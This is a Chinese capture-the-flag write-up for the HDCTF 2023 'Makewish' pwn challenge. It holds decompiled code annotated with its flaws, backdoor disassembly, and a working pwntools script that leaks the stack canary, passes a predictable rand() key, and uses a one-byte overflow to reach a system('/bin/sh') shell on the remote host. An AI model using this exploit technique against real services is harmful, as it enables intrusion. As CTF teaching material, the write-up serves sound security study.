[HDCTF 2023]Makewish bugmaker的WriteUp
解题过程
信息搜集
checksec pwn
[*] '/home/kali/Desktop/ctf/pwn'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    Stripped: No
分析
- Linux64位小端序
- Canary
查看源码
// Decompiler (IDA) pseudocode of the challenge binary, reformatted for
// reading.  The comments record the weak points a reviewer would flag and
// the bounds that would close them; the code itself is left as decompiled.
int __fastcall main(int argc, const char **argv, const char **envp)
{
    int v4; // [rsp+8h] [rbp-38h] BYREF   user-supplied key (4 bytes)
    int v5; // [rsp+Ch] [rbp-34h]         expected key
    char buf[40]; // [rsp+10h] [rbp-30h] BYREF   name buffer, 0x28 bytes
    unsigned __int64 v7; // [rsp+38h] [rbp-8h]   stack canary, directly after buf

    v7 = __readfsqword(0x28u);
    init(argc, argv, envp);
    // No srand() is visible in init() or here, so rand() yields the same
    // sequence on every run and v5 is effectively a constant, not a secret.
    // Fix: derive the key from a CSPRNG (e.g. getrandom()) rather than rand().
    v5 = rand() % 1000 + 324;
    puts("tell me you name\n");
    // Reads up to 0x30 (48) bytes into a 40-byte buffer: the last 8 bytes
    // land on v7 (the canary).  read() also leaves buf unterminated, so the
    // puts(buf) below echoes every byte up to the next 0x00 -- which can
    // include the bytes of v7.  Fix: read(0, buf, sizeof buf - 1) and
    // NUL-terminate at the returned length before printing.
    read(0, buf, 0x30uLL);
    puts("hello,");
    puts(buf);
    puts("tell me key\n");
    read(0, &v4, 4uLL); // bounded to sizeof v4; fine as such
    if ( v5 == v4 )
        return vuln();
    puts("failed");
    return 0;
}

// Disables stdio buffering on the three standard streams (CTF boilerplate).
// _bss_start is the decompiler's label for the second stream; presumably
// stdout -- confirm in the binary.
int init()
{
    setvbuf(stdin, 0LL, 2, 0LL);
    setvbuf(_bss_start, 0LL, 2, 0LL);
    return setvbuf(stderr, 0LL, 2, 0LL);
}

__int64 vuln()
{
    _BYTE buf[88]; // [rsp+0h] [rbp-60h] BYREF   0x58 bytes
    unsigned __int64 v2; // [rsp+58h] [rbp-8h]   stack canary, directly after buf

    v2 = __readfsqword(0x28u);
    puts("welcome to HDctf,You can make a wish to me");
    // Two defects on one line: read() may return up to 0x60 (96) bytes into
    // an 88-byte buffer, overrunning into v2; and the return value is used
    // unchecked as an index, so a count of 96 stores a 0 at buf[96], i.e. the
    // byte at rbp+0 (on this frame layout the low byte of the saved rbp), and
    // a -1 on error stores below the buffer.  Fix: cap the size at
    // sizeof buf - 1 and bail out on a negative return before indexing.
    buf[(int)read(0, buf, 0x60uLL)] = 0;
    puts("sorry,i can't do that");
    return 0LL;
}
分析
- 它的key为v5 = rand() % 1000 + 324,是一个伪随机数;init中并没有初始化种子,所以v5会是定值,可以用ida动态调试得到v5 == 0x2C3 == 707。main和vuln分别存在一个read。
- 我们可以先用main中的read泄露出canary,然后用vuln中的read跳转到backdoor。
- 之所以要泄露canary,是因为我们要填满vuln中buf的0x60 == 96个字节,让buf[96] = rbp = 0。
- 可以理解为当rbp被修改成0后,它后面的返回地址就会在buf中乱跳,我们只要在buf中填满backdoor的地址,就有机会让它的返回地址跳到backdoor,比如构造payload = p64(backdoor) * 11 + p64(canary)。
数据搜集
; IDA disassembly of the function the writeup calls the backdoor.  Nothing in
; the decompiled main()/init()/vuln() above references it: an unreferenced
; routine that spawns a shell is a planted backdoor and, in real software,
; a finding in its own right.
; Because the binary is linked without PIE (checksec: "No PIE (0x400000)"),
; this code sits at a fixed address; building with -fPIE -pie would randomise it.
.text:00000000004007C7 public treasure
.text:00000000004007C7 treasure proc near
.text:00000000004007C7 ; __unwind {
.text:00000000004007C7 push rbp
.text:00000000004007C8 mov rbp, rsp
.text:00000000004007CB mov edi, offset command ; "/bin/sh"  ; argument for system()
.text:00000000004007D0 call _system ; system("/bin/sh")
.text:00000000004007D5 nop
.text:00000000004007D6 pop rbp
.text:00000000004007D7 retn
.text:00000000004007D7 ; } // starts at 4007C7
.text:00000000004007D7 treasure endp
分析
- 这里我们取 `.text:00000000004007CB mov edi, offset command ; "/bin/sh"` 为起点
最终脚本
# Author's proof-of-concept for the writeup above.  The comments note which
# weakness in the decompiled binary each step depends on and what would close it.
# `struct` is only in scope because pwntools re-exports it through the star
# import; an explicit `import struct` would make that dependency visible.
from pwn import *
# connect
r = remote("node4.anna.nssctf.cn", 22064)
# build the payload that leaks the canary:
# main() reads 0x30 bytes into a 40-byte buffer and echoes it with puts()
# without NUL-terminating it, so the bytes after the buffer (the canary)
# are printed back.  Bounding the read to sizeof buf - 1 and terminating
# the string would stop the leak.
payload = cyclic(40)
payload += '|'.encode()
r.sendafter("tell me you name\n\n".encode(), payload)
# recover the canary: the 7 leaked bytes are prefixed with its 0x00 low byte
r.recvuntil('|'.encode())
canary = u64('\x00'.encode() + r.recv(7))
# pass the v5 == v4 check: v5 comes from an unseeded rand(), so it is the
# same on every run (0x2C3 per the writeup's debugging); a CSPRNG-derived
# key would not be predictable like this
key = 0x2C3
payload = struct.pack("<i", key)
r.sendafter("tell me key\n\n".encode(), payload)
# address of the backdoor collected above (fixed because the binary is non-PIE)
backdoor_elf_addr = 0x4007CB
# build and send the payload that diverts control to the backdoor:
# vuln() reads 0x60 bytes into an 88-byte buffer and then writes
# buf[read_len] = 0 unchecked; capping the read at sizeof buf - 1 and
# checking the return value would close both holes
payload = p64(backdoor_elf_addr) * 11
payload += p64(canary)
r.sendafter("welcome to HDctf,You can make a wish to me\n".encode(), payload)
# interact
r.interactive()
r.close()
D:\Environment\python\python-3.13.0-amd64\python.exe D:\Work\test\testPython\src\com\probie\test01\Main.py
[x] Opening connection to node4.anna.nssctf.cn on port 22064
[x] Opening connection to node4.anna.nssctf.cn on port 22064: Trying 1.14.71.254
[+] Opening connection to node4.anna.nssctf.cn on port 22064: Done
[*] Switching to interactive mode
sorry,i can't do that
ls
bin cs5 dev flag lib lib32 lib64
cat flag
NSSCTF{5e0c6639-cabc-49dd-9bd3-e6b33ba61cb8}
得到:NSSCTF{5e0c6639-cabc-49dd-9bd3-e6b33ba61cb8}
[HDCTF 2023]Makewish bugmaker
2026-01-02 05:18・By

probie
栈迁移栈PWN
© 著作权归作者所有